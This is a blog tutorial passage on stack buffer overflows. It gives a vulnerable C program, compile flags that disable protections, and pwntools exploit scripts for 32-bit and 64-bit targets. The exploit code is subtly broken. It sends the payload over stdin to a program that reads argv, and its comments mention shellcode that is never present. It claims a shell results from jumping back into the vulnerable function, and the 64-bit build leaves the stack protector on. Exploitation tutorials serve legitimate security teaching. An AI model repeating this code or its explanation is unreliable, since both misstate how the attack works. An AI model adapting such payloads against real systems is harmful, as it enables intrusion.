strangerRidingCaml
4. Stack Smashing (32-bit and 64-bit) 본문
Stack Smashing (32-bit and 64-bit)
Stack smashing, also known as buffer overflow, is a type of vulnerability that occurs when a program writes more data to a buffer than it can hold, resulting in overwriting adjacent memory locations, including return addresses and other important data.
Lab Activity: Stack Smashing (32-bit)
In this lab activity, we'll demonstrate a simple stack smashing vulnerability in a 32-bit C program and create an exploit using Python.
Defender Side Code:
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: %s \n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
To compile the defender side code:
gcc -m32 -fno-stack-protector -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Address of the vulnerable function
vulnerable_function_addr = 0x0804844b
# Payload to overwrite the return address with the address of the shellcode
payload = b"A" * 72 + p32(vulnerable_function_addr)
# Establishing connection to the vulnerable program
p = process("./vulnerable_program")
# Sending the payload
p.sendline(payload)
# Interactive shell
p.interactive()
The exploit code constructs a payload with 72 bytes of padding followed by the address of the vulnerable function. It then establishes a connection to the vulnerable program, sends the payload, and gains an interactive shell upon successful exploitation.
Lab Activity: Stack Smashing (64-bit)
In this lab activity, we'll demonstrate a simple stack smashing vulnerability in a 64-bit C program and create an exploit using Python.
Defender Side Code:
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: %s \n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Address of the vulnerable function
vulnerable_function_addr = 0x0000000000400566
# Payload to overwrite the return address with the address of the shellcode
payload = b"A" * 72 + p64(vulnerable_function_addr)
# Establishing connection to the vulnerable program
p = process("./vulnerable_program")
# Sending the payload
p.sendline(payload)
# Interactive shell
p.interactive()
The exploit code for 64-bit follows a similar structure to the 32-bit exploit, but uses 64-bit addresses and payload construction.
'Linux kernel exploit' 카테고리의 다른 글
6. Return-Oriented Programming (ROP) (0) | 2024.05.12 |
---|---|
5. Return-to-User (ret2usr) Attacks (0) | 2024.05.12 |
3. Debugging Kernel and Modules (0) | 2024.05.12 |
2. Development of Kernel Module (0) | 2024.05.12 |
1. Introduction to Linux Kernel Exploitation (0) | 2024.05.12 |